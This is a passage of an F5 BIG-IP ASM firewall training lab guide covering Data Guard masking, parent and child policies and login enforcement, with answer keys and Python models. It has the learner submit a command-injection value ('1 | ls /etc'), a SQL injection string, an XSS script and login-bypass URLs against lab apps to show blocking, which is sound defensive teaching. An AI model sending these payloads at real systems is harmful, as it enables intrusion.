tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } pool dvwa_pool

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Virtual Server List page and examine dvwa_virtual.
Note that this virtual server is currently using port 80, which is not PCI compliant.
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment Policy
Virtual Server dvwa_virtual (HTTP)

− Once the policy is created open the Security > Reporting > Application > PCI Compliance page.
The PCI Compliance Report identifies security measures required to comply with PCI-DSS 3.0. It indicates which
measures are met, which are not met, and which are not relevant. Currently there are several PCI requirements
that aren’t yet met.
− Click Identify and authenticate access to system components.
To meet PCI compliance, there needs to be unique usernames for all BIG-IP system users.
− To fix this compliance issue right-click on the word here and select Open link in a new tab.
− In the new tab click Create, then create a new user (use your first name for the User Name and
admin.F5demo.com for the Password, and make yourself an Administrator), then click Finished, and then close
the second tab.
− Reload the PCI Compliance tab.
You’ve now completed PCI compliance sub-requirement 8.
− Click User is forced to change password every 90 days.
To meet PCI compliance, there needs to be a strong password policy on the BIG-IP system.
− To fix this compliance issue click Fix Automatically.
After the page refreshes, you’ve now completed PCI compliance sub-requirement 8b. This has created a
password policy on the BIG-IP system where all BIG-IP system users must change their passwords every 90 days.
− Click Encrypt transmissions of cardholder data across open, public networks.
To meet PCI compliance, the web application must be using HTTPS and a PCI compliant SSL profile.
− To fix part of this compliance issue click Fix Automatically.
You’re notified that all your insecure SSL profiles will be removed.
− Click OK.
This added a PCI compliant SSL client profile to the virtual server; however, the virtual server is still using HTTP.
− Navigate to Local Traffic and right-click on Virtual Servers and select Open link in new tab, and in the new tab
click dvwa_virtual.
− Modify the Service Port to 443.
− Examine the SSL Profile (Client) value.
BIG-IP ASM added a new SSL profile named pci-compliant-clientssl.
− Click Update, and then close the second tab.
− Reload the PCI Compliance tab.
You’ve now completed PCI compliance sub-requirement 4.
− Click Develop and maintain secure systems and applications.
To meet PCI compliance the security policy must have signature sets attached, the signatures must be enforced,
and the security policy must be in blocking mode.
− Navigate to Security and right-click on Application Security and select Open link in new tab, and in the new tab
click dvwa_security_policy.
− For Enforcement Mode click the Blocking button, and then click Save.
− Click Attack Signatures, then click the … next to Enforce and select Enforce all Staged Signatures, then close the
second tab.
− Reload the PCI Compliance tab.
You’ve now completed PCI compliance sub-requirement 6. The final step is sub-requirement 3.
− Click Protect stored cardholder data.
The final step for PCI compliance is to enable Data Guard to protect credit card numbers.

Task 2 – Examine and then Protect Against Information Leakage


View the threat of information leakage, and then update dvwa_security_policy to prevent this PCI compliance
violation.

− Open Firefox and click the DVWA 443 bookmark (add an exception), and then log in as bobsmith / password.
− Click XSS stored, then create an entry named Order notes, then copy and paste the following Review, and then
click Submit Review.
Please bill my credit card #4012-8888-8888-1881.

Credit card numbers are being sent in cleartext in the HTTP response. This is known as information leakage and is
not PCI compliant.
− In the Configuration Utility on the PCI Compliance page, within the Description section right-click
on Data Guard screen and select Open link in new tab.
− In the new tab select the Data Guard checkbox, and then click Save.
Notice that by default Data Guard protects both credit card numbers and US social security numbers. Also notice
that the security policy is currently configured to block requests when information leakage is detected. You don’t
want to block these responses; you just want the sensitive data masked.
− Open the Learning and Blocking Settings page, and then expand Data Guard.

Notice that this violation includes the Block checkbox. That means that whenever a credit card number
or US social security number is seen in an HTTP response the response will be blocked.
− Clear the Block checkbox, then click Save, and then click Apply Policy.
− In the DVWA page click XSS stored and examine the Order notes entry.
Credit card numbers are now being masked by BIG-IP ASM, except for the last four digits.
− Create another entry named My details, then copy and paste the following Review, and then click Submit Review.
Name: Bob Smith, SSN: 123-45-6789.

Social security numbers are also being masked by BIG-IP ASM.


− In the Configuration Utility reload the PCI Compliance tab.
We have now met all the security measures required for PCI compliance.
− Click Printable Version, and then open the PDF.
− Scroll down to the Known vulnerabilities protection section.
Customers can keep this PDF in their records to verify that they’ve met PCI compliance requirements.
− Close the PDF tab.

Task 3 – Create a Mask for Different Country Code


Update the Data Guard settings to prevent information leakage for UK national insurance numbers.

− In Firefox create an entry named My UK ID, then copy and paste the following Review, and then
click Submit Review.
My UK national insurance ID number is CM457829G.

The user’s confidential UK national insurance number is sent in the HTTP response. Much like the US social
security number, these entries should be masked. To do this, you must understand the design of this custom
pattern. All UK national insurance numbers begin with two capital letters, followed by six numbers, followed by
one last capital letter.
− In the Configuration Utility, on the Data Guard tab select the Custom Patterns checkbox.
− In the New Pattern field copy and paste the following regular expression, and then click Add.
[A-Z]{2}[0-9]{6}[A-Z]

In this custom pattern, [A-Z] identifies any capital letter from A through Z, and {2} identifies two of those
capital letters. [0-9] identifies any digit from 0 through 9, and {6} identifies six of those digits.
And then finally the [A-Z] identifies one final capital letter.
− Click Save, then click Apply Policy.
− In the DVWA page click XSS stored.
The user’s UK national insurance number is now being masked by BIG-IP ASM.

Let’s say you wanted to display the last 3 characters of the number, similar to the last 4 numbers of
a social security number.
− In the Configuration Utility select the previous custom pattern and click Remove.
− In the New Pattern field copy and paste the following regular expression, then click Add, then click Save, then
click Apply Policy.
[A-Z]{2}[0-9]{4}

− In the DVWA page click XSS stored.


− Create another entry named UK ID?, then copy and paste the following Review, and then click Submit Review.
My UK national insurance ID number is jw817302q.

Questions:
Was this user ID masked? __________________

Why or why not? ____________________________________________________

− Create another entry named UK ID?, then copy and paste the following Review, and then click Submit Review.
My UK national insurance ID number is PR 59 44 38 D.

Questions:
Was this user ID masked? __________________

Why or why not? ____________________________________________________

− In the Configuration Utility, on the Data Guard tab copy and paste the following three regular expressions (be sure
to click Add for each), then click Save, then click Apply Policy, and then close the second tab.
[a-z]{2}[0-9]{4}

[A-Z]{2} [0-9]{2} [0-9]{2}

[a-z]{2} [0-9]{2} [0-9]{2}

− In the DVWA page click XSS stored.


All the UK national insurance numbers are now being masked by BIG-IP ASM.
− Create another entry named UK ID?, then copy and paste the following Review, and then click Submit Review.
My UK national insurance ID number is qq 11 22 33 z.

Questions:
Was this user ID masked? __________________

− Click Setup, then click Create / Reset Database, and then close the Firefox window.
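The custom patterns from this task run against the reviews the task has you submit, as an added Python example (not F5 or BIG-IP ASM code). re.sub stands in for Data Guard's masking, and the assumption made here is that the pattern constructs used ({n}, [A-Z], literal spaces) and case-sensitivity behave as they do in Python's re module.

```python
"""The lab's Data Guard custom patterns run over its sample reviews
(added example, not F5 code).

Lets you check which reviews each pattern masks, and why the lowercase and
space-separated forms slip past a capital-letters-only pattern.
"""
import re

# Task 3 patterns, in the order the lab adds them.
FULL_NUMBER = r"[A-Z]{2}[0-9]{6}[A-Z]"   # masks CM457829G entirely
FIRST_SIX = r"[A-Z]{2}[0-9]{4}"          # leaves the last 3 characters visible
ALL_FORMS = [
    r"[A-Z]{2}[0-9]{4}",
    r"[a-z]{2}[0-9]{4}",
    r"[A-Z]{2} [0-9]{2} [0-9]{2}",
    r"[a-z]{2} [0-9]{2} [0-9]{2}",
]

# The reviews the lab has you submit.
REVIEWS = {
    "My UK ID": "My UK national insurance ID number is CM457829G.",
    "UK ID? (lowercase)": "My UK national insurance ID number is jw817302q.",
    "UK ID? (spaced)": "My UK national insurance ID number is PR 59 44 38 D.",
    "UK ID? (both)": "My UK national insurance ID number is qq 11 22 33 z.",
}


def mask(text: str, patterns) -> str:
    """Replace every match of every pattern with asterisks of the same length."""
    for pattern in patterns:
        text = re.sub(pattern, lambda m: "*" * len(m.group(0)), text)
    return text


def is_masked(text: str, patterns) -> bool:
    """True when at least one pattern matched somewhere in the response text."""
    return mask(text, patterns) != text


def which_pattern(text: str, patterns):
    """Name the first pattern that matches, or None; answers the 'why or why not?' lines."""
    for pattern in patterns:
        if re.search(pattern, text):
            return pattern
    return None


if __name__ == "__main__":
    for name, review in REVIEWS.items():
        print(f"{name:20} FIRST_SIX only: {is_masked(review, [FIRST_SIX])!s:5}  "
              f"all four patterns: {is_masked(review, ALL_FORMS)}")
    print(mask(REVIEWS["My UK ID"], [FIRST_SIX]))  # ...number is ******29G.
```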

PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
exit


Question and Answer Key


Task 3 – Create a Mask for Different Country Code
Q: Was this user ID masked?
A: No

Q: Why or why not?


A: The custom mask specifies capital letters only.

Q: Was this user ID masked?


A: No

Q: Why or why not?


A: The custom mask doesn’t account for spaces.

Q: Was this user ID masked?


A: Yes


ASM Lesson 9 – Parent and Child Security Policies



Exercise – Use Parent and Child Security Policies


• Estimated completion time: 45 minutes.

Task 1 – Create and Configure a Parent Security Policy


Create a parent security policy, then assign the required and optional inherited settings, and then configure
the parent security policy settings.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } pool dvwa_pool
tmsh create ltm pool hackazon_pool members add { 10.1.20.20:80 { address 10.1.20.20 } }
tmsh create ltm virtual hackazon_virtual destination 10.1.10.43:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } pool hackazon_pool

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name parent_security_policy
Policy Type Parent
Policy Template Comprehensive
Signature Staging Disabled
Server Technologies Apache Tomcat, PHP, Unix/Linux

− Once the policy is created click parent_security_policy, and then in the left panel click Inheritance Settings.
− Configure the following inheritance settings, and then click Save.
o Attack Signatures: None
o Data Guard: Optional
o Evasion Techniques: None
o File Types: Mandatory
o General Settings: Mandatory
o Headers: None
o HTTP Protocol Compliance: None
o IP Addresses and Geolocations: Mandatory
o Parameters: Mandatory
o Policy Building Process: Mandatory
o WebSocket Protocol Compliance: None
− Open the Learning and Blocking Settings page, and then expand Attack Signatures and click Change.
− Add the Medium Accuracy Signatures, Cross Site Scripting Signatures, Other Application Attacks Signatures,
and SQL Injection Signatures, and then click Change.

− Collapse Attack Signatures, and then expand Data Guard and clear the Block checkbox.
− Collapse Data Guard, then expand File Types, and then from the Learn New File Types list select Always.
− Collapse File Types, then expand General Settings, then for the Request length exceeds defined buffer size
violation select the Alarm and Block checkboxes.
− Collapse General Settings, then expand Parameters, and then from the Learn New Parameters list
select Never (wildcard only).
− Clear the Learn, Alarm, and Block checkboxes for ALL parameter violations, and then click Save.

− Open the Application Security > Data Guard page and select the Data Guard checkbox, and then click Save.
− Open the Application Security > Geolocation Enforcement page and add both Iran, Islamic Republic of
and Syrian Arab Republic to the Disallowed Geolocations list.
− Click Save, and then click Apply Policy.

Task 2 – Create a Child Security Policy


Create a child security policy for dvwa_virtual that uses parent_security_policy as its parent policy.

− Open the Policies List page and click Create.
(HINT: You can simply click on “Application Security”.)
− Use the following information for the new policy. (NOTE: Do not click Save until you’ve filled in the table.)
Policy Name dvwa_security_policy
Policy Type Security
Policy Template Comprehensive
Parent Policy parent_security_policy
Virtual Server dvwa_virtual (HTTP)

Question: Of the following parent policy settings, which can be changed, and which can’t?

Policy option                      Can be changed   Can’t be changed
Application Language               ______           ______
Enforcement Mode                   ______           ______
Policy Builder Learning Mode       ______           ______
Auto-Added Signature Accuracy      ______           ______
Trusted IP Addresses               ______           ______
Policy Builder Learning Speed      ______           ______
Signature Staging                  ______           ______
Server Technologies                ______           ______
Policy is Case Sensitive           ______           ______
− Click Save.
− Once the policy is created, click dvwa_security_policy, and then click Inheritance Settings.

Question:
Which options can be declined? ________________________________________

− For Server Technologies select Decline, and then click Save.


− Click the back-arrow button to return to the Policies List page.

− Click parent_security_policy, and then click Inheritance Settings.


− Expand the Data Guard and Server Technologies sections.

You can see which child security policies have accepted and which have declined the optional policy settings.
− For Attack Signatures, change the Inheritance Settings to Mandatory, and then click Save.

Task 3 – Examine Child Inheritance


Examine the settings of parent_security_policy that can and cannot be modified in a child security policy.

− Click the back-arrow button to return to the Policies List page, and then click dvwa_security_policy.
− For Server Technologies attempt to delete Apache Tomcat from the list.

Questions:
Were you able to delete the server technology? ___________________

Why or why not? ____________________________________________________________

− Click Save, and then open the Learning and Blocking Settings page.
− In the current edited security policy list, note that you are editing dvwa_security_policy.

It’s important to identify which security policy you’re working with when managing several security policies
on the same BIG-IP system.
− Expand Attack Signatures and click Change.
− Attempt to remove the Medium Accuracy Signatures set.
− Attempt to add the Command Execution Signatures and click Change.
Because Attack Signatures was marked as Mandatory, attack signature sets can’t be removed from
the child policy; however, additional signature sets can be added to the child policy. Remember, this additional
signature set won’t be added to other child policies.
− Collapse Attack Signatures, and then expand Data Guard and note the Block setting.
The Block checkbox is disabled because the Data Guard category was marked as Mandatory in the parent policy.
− Collapse Data Guard, and then expand File Types and note the Learn New File Types and violations settings.
The Learn New File Types and all violation settings inherited the parent policy settings and cannot be changed
because the File Types category was marked as Mandatory in the parent policy.
− Collapse File Types, and then expand General Settings and note the Request length exceeds defined buffer size
settings.
The settings in this section can’t be changed, as they are marked as Mandatory in the parent policy.
− Collapse General Settings, and then expand Headers.
The settings in this section can be modified for the child security policy, as the inheritance setting for
the Headers category was left as None.
− Click Save.
− Open the Data Guard page and attempt to clear the Data Guard checkbox.
− Open the Geolocation Enforcement page and attempt to remove Iran, Islamic Republic of from the Disallowed
Geolocations list.
− Attempt to add Korea, Democratic People’s Republic of to the Disallowed Geolocations list.

Questions:
Were you able to delete Iran? ______________

Were you able to add North Korea? ______________

Why did you get these results? __________________________________________________

Will other child security policies see North Korea as a disallowed geolocation? _____________

− Click Save.

→NOTE: The next steps are to ensure that the attack signatures in the next task will be blocked.

− Open the Parameters List page, and then click the wildcard (*).
− Clear the Perform Staging checkbox.
− For Maximum Length select the Any option, then click Update, and then click Apply Policy.
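The inheritance behaviour observed in Tasks 2 and 3 can be modelled in a few lines. The following Python is an added example written for this guide, not F5 code and not anything the BIG-IP system exposes. It reduces each policy category to a set of entries (signature sets, server technologies, disallowed geolocations) and encodes the three inheritance modes: Mandatory entries are inherited and locked, Optional entries are locked only while the child accepts them, and None leaves the child with its own editable copy. Server Technologies is treated as Optional because the answer key lists it among the declinable settings; the class and function names are this example's own.

```python
"""Toy model of parent/child security policy inheritance (constructed example, not F5 code)."""

MANDATORY, OPTIONAL, NONE = "Mandatory", "Optional", "None"


def can_decline(parent, cat):
    """Only Optional categories offer the Accept/Decline choice on the child."""
    return parent.inheritance.get(cat) == OPTIONAL


class ParentPolicy:
    """Per-category entries plus the inheritance mode chosen on the parent's
    Inheritance Settings page."""

    def __init__(self, name, entries, inheritance):
        self.name = name
        self.entries = {cat: set(items) for cat, items in entries.items()}
        self.inheritance = dict(inheritance)


class ChildPolicy:
    def __init__(self, name, parent, declined=()):
        self.name = name
        self.parent = parent
        self.declined = set(declined)
        for cat in self.declined:
            if not can_decline(parent, cat):
                raise ValueError(f"{cat} is {parent.inheritance.get(cat)}; it cannot be declined")
        # Entries owned by this child. A category set to None (or Optional and
        # declined) gives the child its own editable copy; otherwise the child
        # starts empty and may only add on top of what it inherits.
        self.local = {}
        for cat in parent.inheritance:
            self.local[cat] = set() if self._inherits(cat) else set(parent.entries.get(cat, ()))

    def _inherits(self, cat):
        mode = self.parent.inheritance[cat]
        return mode == MANDATORY or (mode == OPTIONAL and cat not in self.declined)

    def inherited(self, cat):
        """Entries locked by the parent: the parent's live list for inherited categories."""
        return self.parent.entries.get(cat, set()) if self._inherits(cat) else set()

    def effective(self, cat):
        return self.inherited(cat) | self.local.get(cat, set())

    def add(self, cat, item):
        # Adding is always allowed; the addition stays local to this child only.
        self.local.setdefault(cat, set()).add(item)
        return True

    def remove(self, cat, item):
        if item in self.inherited(cat):
            return False  # greyed out in the GUI: the parent owns this entry
        self.local.setdefault(cat, set()).discard(item)
        return True


def run_lab_scenario():
    """Replays the edits attempted in Tasks 2 and 3 and returns each outcome."""
    parent = ParentPolicy(
        "parent_security_policy",
        entries={
            "Attack Signatures": {"Medium Accuracy Signatures", "Cross Site Scripting Signatures",
                                  "Other Application Attacks Signatures", "SQL Injection Signatures"},
            "Server Technologies": {"Apache Tomcat", "PHP", "Unix/Linux"},
            "IP Addresses and Geolocations": {"Iran, Islamic Republic of", "Syrian Arab Republic"},
            "Headers": set(),
        },
        inheritance={"Attack Signatures": MANDATORY, "Server Technologies": OPTIONAL,
                     "IP Addresses and Geolocations": MANDATORY, "Headers": NONE},
    )
    dvwa = ChildPolicy("dvwa_security_policy", parent, declined={"Server Technologies"})
    hackazon = ChildPolicy("hackazon_security_policy", parent)  # accepts all optional settings
    nk = "Korea, Democratic People's Republic of"
    return {
        "delete_tomcat": dvwa.remove("Server Technologies", "Apache Tomcat"),
        "remove_medium_accuracy": dvwa.remove("Attack Signatures", "Medium Accuracy Signatures"),
        "add_command_execution": dvwa.add("Attack Signatures", "Command Execution Signatures"),
        "delete_iran": dvwa.remove("IP Addresses and Geolocations", "Iran, Islamic Republic of"),
        "add_north_korea": dvwa.add("IP Addresses and Geolocations", nk),
        "sibling_sees_north_korea": nk in hackazon.effective("IP Addresses and Geolocations"),
        "sibling_sees_command_execution":
            "Command Execution Signatures" in hackazon.effective("Attack Signatures"),
    }


if __name__ == "__main__":
    for step, outcome in run_lab_scenario().items():
        print(f"{step}: {outcome}")
```

Because `inherited()` returns the parent's live set, a later change on the parent (for example adding a signature set) is immediately visible in every child that inherits that category, which is the point of putting shared settings in a parent policy.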


Task 4 – Test the Child Security Policy


Use iMacros for Mozilla Firefox to generate traffic for building the child security policy, and then attempt
a couple of violations.

− Open a New private window (Firefox) and click the iMacros button, then in the iMacros pane
select Exercises > auto build.iim, and then click Play (Loop). Wait for the macro to complete before moving on.
− In the Configuration Utility open the Traffic Learning page.
The child security policy is already learning file types, showing that file type enforcement is underway.
− In the DVWA page log in as hacker / hackyou.
− Click Command Execution, then copy and paste the following in the field, and then click Submit.
1 | ls /etc

− Click the DVWA bookmark, then click XSS stored, then create an entry named Order notes, then copy and paste
the following Review, and then click Submit Review.
Please bill my credit card #4012-8888-8888-1881.

The web application is already protected against common attack signatures and information leakage.
− Click Setup, and then click Create / Reset Database.

IF TIME PERMITS – Create a Second Child Security Policy


Create another child security policy for hackazon_virtual that uses parent_security_policy.

− In the Configuration Utility open the Policies List page, click parent_security_policy, and then
click Inheritance Settings.
− For Attack Signatures, change the Inheritance Settings to None, and then click Save.

→NOTE: You’re changing this setting now due to a bug in ASM v15.1.

− Click the back-arrow button to return to the Policies List page, then click Create, and then use the following
information for the new policy, and then click Save.
Policy Name hackazon_security_policy
Policy Template Comprehensive
Parent Policy parent_security_policy
Virtual Server hackazon_virtual (HTTP)

− Once the policy is created, click parent_security_policy, and then click Inheritance Settings.
− For Attack Signatures, change the Inheritance Settings back to Mandatory, and then click Save.
− Click the back-arrow button to return to the Policies List page, then click hackazon_security_policy, and then view
the Inheritance Settings.
You’ll accept all optional security policy settings.
− Open the Parameters List page, and then click the wildcard (*).
− Clear the Perform Staging checkbox.
− For Maximum Length select the Any option, then click Update, and then click Apply Policy.
− In Firefox click the Hack bookmark.

− In the search box, copy and paste the following into the field, and then click Submit.
%' or 1='1

− Click the Hack bookmark, then click FAQ, then create a FAQ using your email address and copy and paste the
following Question, and then click Submit.
Please check my account number 536-90-9080.

The web application is immediately protected against common attack signatures and information leakage.
− Close the Firefox window.

PREPARE FOR NEXT EXERCISE


− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
tmsh delete ltm virtual hackazon_virtual
tmsh delete ltm pool hackazon_pool
tmsh delete ltm node 10.1.20.20
tmsh delete ltm policy asm_auto_l7_policy__hackazon_virtual
tmsh delete asm policy hackazon_security_policy
tmsh delete asm policy parent_security_policy
exit

Question and Answer Key


Task 2 – Create a Child Security Policy
Q: Of the following parent policy settings, which can be changed, and which can’t?
A: Application Language: Can’t be changed
Enforcement Mode: Can be changed
Policy Builder Learning Mode: Can’t be changed
Auto-Added Signature Accuracy: Can be changed
Trusted IP Addresses: Can be changed
Policy Builder Learning Speed: Can’t be changed
Signature Staging: Can be changed
Server Technologies: Can’t be changed
Policy is Case Sensitive: Can’t be changed

Q: Which options can be declined?


A: Data Guard and Server Technologies

Task 3 – Examine Child Inheritance


Q: Were you able to delete the server technology?
A: Yes

Q: Why or why not?


A: This category was marked as Optional in the parent policy and we chose to Decline the
inheritance requirements.

Q: Were you able to delete Iran?


A: No

Q: Were you able to add North Korea?
A: Yes

Q: Why did you get these results?


A: This category was marked as Mandatory in the parent policy.

Q: Will other child security policies see North Korea as a disallowed geolocation?
A: No


ASM Lesson 10 – Login Enforcement and Violation Detection



Exercise – Use Login Enforcement and Violation Detection
• Estimated completion time: 45 minutes.

Task 1 – Create a Security Policy without Session Tracking


Create a security policy for dvwa_virtual, and then examine how the ASM tracks session details in the log file.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.


− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { } } security-log-profiles add { "Log all requests" } pool dvwa_pool

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment
Virtual Server dvwa_virtual (HTTP)
Enforcement Mode Blocking
Policy Builder Learning Mode Automatic
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)
Signature Staging Disabled

− Once the policy is created open the Learning and Blocking Settings page.
− Expand URLs, and then from the Learn New HTTP URLs list select Always, then click Save, and then
click Apply Policy.
− Open a New private window (Firefox) and click the DVWA bookmark, and then close the Firefox window.
− In the Configuration Utility, open the Policies List page and click dvwa_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Builder Learning Mode click the Disabled button, then click Save, and then click Apply Policy.
− Open Firefox and click the DVWA bookmark, and then log in as hacker / hackyou.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Select the most recent (higher in the list) /login.php log entry and on the right-side of the page click All Details.

− Note the Device ID, Username, and Session ID values.

Although the session ID is being tracked, the device ID and username currently aren’t.

Task 2 – Add Login Page Enforcement


Examine how you can bypass the DVWA login page, and then add login page enforcement for dvwa_security_policy.

− In the DVWA page click Logout, and then examine the DVWA login page.
Users should always log in before submitting requests to the web application.
− Copy and paste the following in the URL field (at the top of the page), and then press Enter.
http://10.1.10.35/vulnerabilities/sqli/?id=1&Submit=Submit#

− Copy and paste the following in the URL field, and then press Enter.
http://10.1.10.35/vulnerabilities/xss_r/?name=Bob+Smith#

− In the Configuration Utility reload the Event Logs > Application > Requests page.
− Select the /vulnerabilities/sqli/ log entry and view the details in the Request section.
− Select the /vulnerabilities/xss_r/ log entry and view the details in the Request section.
Although you didn’t see a response page in the DVWA page, these requests were submitted to the DVWA web
server and bypassed the login page.
− Navigate to Application Security > Sessions and Logins and right-click on Login Pages List and
select Open link in a new tab, and then in the new tab click Create.
− For Login URL leave Explicit > HTTP selected and click into the field and select /login.php.
This URL was learned by the policy builder in task 1.
− Configure the login page using the following information, and then click Create.
Authentication Type HTML Form
Username Parameter Value username
Password Parameter Value password
Expected HTTP response status code 302

− Open the Application Security > Sessions and Logins > Login Enforcement page.
− In the Authenticated URLs field copy and paste /vulnerabilities/sqli/, and then click Add.
− Copy and paste /vulnerabilities/xss_r/ into the field and click Add, and then click Save.
− Open the Learning and Blocking Settings page and expand Sessions and Logins.
− For the Login URL bypassed violation select the Block checkbox, then click Save, and then click Apply Policy.
− In the DVWA page click the DVWA bookmark, then copy and paste the following in the URL field, and
then press Enter.
http://10.1.10.35/vulnerabilities/sqli/?id=1&Submit=Submit#

− Click the DVWA bookmark, then copy and paste the following in the URL field, and then press Enter.
http://10.1.10.35/vulnerabilities/xss_r/?name=Bob+Smith#

− Click the DVWA bookmark, then copy and paste the following in the URL field, and then press Enter.
http://10.1.10.35/vulnerabilities/brute/?username=admin&password=password&Login=Login#

Questions:
Was the third request blocked? ___________________

Why or why not? ____________________________________________________________

− In the Configuration Utility use the second tab to open the Sessions and Logins > Login Enforcement page, then in
the Authenticated URLs field copy and paste /vulnerabilities/*, and then click Add.
− Click Save, then click Apply Policy, and then close the second tab.
− In the DVWA page click the DVWA bookmark, then copy and paste the following in the URL field, then press Enter.
http://10.1.10.35/vulnerabilities/brute/?username=admin&password=password&Login=Login#

− Click the DVWA bookmark, then copy and paste the following in the URL field, then press Enter.
http://10.1.10.35/vulnerabilities/sqli_blind/?id=10&Submit=Submit#

All URLs that begin with /vulnerabilities/ now include login enforcement.
− In the Configuration Utility reload the Event Logs > Application > Requests tab.
− Select any of the blocked log entries and examine the violation and the attack type.
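The following Python is an added example written for this guide, not F5 code, and it shows why the third request in Task 2 is not blocked while the /vulnerabilities/* entry changes that: an explicit Authenticated URL matches only its exact path, whereas a wildcard entry matches every path beneath it. The session counts as authenticated only once the response to /login.php carries the expected status code (302, as configured on the Login Pages entry). The function names and the fnmatch-based wildcard matching are this example's own assumptions about how the list is evaluated.

```python
"""Constructed model of Login Page enforcement (not F5 code)."""
import fnmatch
from urllib.parse import urlsplit

LOGIN_URL = "/login.php"
EXPECTED_LOGIN_STATUS = 302  # Expected HTTP response status code on the Login Pages entry


def url_requires_login(path, authenticated_urls):
    """Does path match an Authenticated URLs entry?  Explicit entries match exactly;
    entries containing '*' are wildcards, and '*' also spans '/' (fnmatch semantics).
    Only '*' is used here; fnmatch would also treat '?' and '[' specially."""
    for entry in authenticated_urls:
        if "*" in entry:
            if fnmatch.fnmatchcase(path, entry):
                return True
        elif path == entry:
            return True
    return False


def process_login_response(session, status_code, expected=EXPECTED_LOGIN_STATUS):
    """Mark the session authenticated only when the login response matches the
    expected status; a failed login that re-renders the form (200) does not."""
    session["authenticated"] = status_code == expected
    return session["authenticated"]


def evaluate_request(url, session, authenticated_urls):
    """Return the violation name ('Login URL bypassed') or 'allowed'."""
    path = urlsplit(url).path  # query string and fragment are not part of the match
    if url_requires_login(path, authenticated_urls) and not session.get("authenticated"):
        return "Login URL bypassed"
    return "allowed"


def run_lab_scenario():
    """Replays the Task 2 requests against the explicit list and the wildcard list."""
    explicit = ["/vulnerabilities/sqli/", "/vulnerabilities/xss_r/"]
    wildcard = explicit + ["/vulnerabilities/*"]
    sqli = "http://10.1.10.35/vulnerabilities/sqli/?id=1&Submit=Submit#"
    brute = "http://10.1.10.35/vulnerabilities/brute/?username=admin&password=password&Login=Login#"
    blind = "http://10.1.10.35/vulnerabilities/sqli_blind/?id=10&Submit=Submit#"

    anonymous = {"authenticated": False}      # the visitor who never used /login.php
    logged_in = {}
    process_login_response(logged_in, 302)    # hacker / hackyou succeeded
    failed = {}
    process_login_response(failed, 200)       # wrong password: form shown again

    return {
        "sqli_explicit": evaluate_request(sqli, anonymous, explicit),
        "brute_explicit": evaluate_request(brute, anonymous, explicit),
        "brute_wildcard": evaluate_request(brute, anonymous, wildcard),
        "blind_wildcard": evaluate_request(blind, anonymous, wildcard),
        "blind_after_login": evaluate_request(blind, logged_in, wildcard),
        "sqli_after_failed_login": evaluate_request(sqli, failed, explicit),
    }


if __name__ == "__main__":
    for request, verdict in run_lab_scenario().items():
        print(f"{request}: {verdict}")
```

The last two cases are the ones worth keeping in mind when configuring a login page: the expected status code is what distinguishes a successful login from a failed one, so an application that answers both with 200 needs a different success condition (for example an expected header or a string in the response).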

Task 3 – Enable Violation Detection by Username


Update dvwa_security_policy by adding session awareness and violation detection by username.

− In the blocked page click the DVWA bookmark, and then log in as hacker / hackyou.
− In the Configuration Utility reload the Event Logs > Application > Requests page.
− Select the most recent /login.php log entry, and then examine the Username value.
Because you created the Login Page element, BIG-IP ASM is now tracking the username of successful logins.
− Click on the triangle icon at the end of Username.

Session tracking is currently disabled in this security policy.

− Navigate to Application Security > Sessions and Logins and right-click on Session Tracking and
select Open link in a new tab, and then in the new tab select the Session Awareness checkbox.
− From the Application Username, select Use Individual Login Pages.
− From the Available list select [HTTP]/login.php, and then click <<.

− On the Block All tab select the Username Threshold checkbox and enter 10 violations, then click Save,
then click Apply Policy, and then close the second tab.
− In the DVWA page click Logout, and then log in as hacker / hackyou.
− Click XSS reflected, then copy and paste the following in the field, and then click Submit.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

− Use Ctrl+F5 to reload the blocking page 5 times, and then close the blocked page.
− In the Configuration Utility reload the Event Logs > Application > Requests tab, then select the most recent
blocked log entry and examine the violation that caused the request to be blocked.
This request was blocked due to detected attack signatures.
− Open a new Firefox window and click the DVWA bookmark and log in as hacker / hackyou, then click XSS reflected,
then paste the previous entry in the field, and then click Submit.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

− Use Ctrl+F5 to reload the blocking page 10 times.


− Click the DVWA bookmark several times, and then close the blocked page.
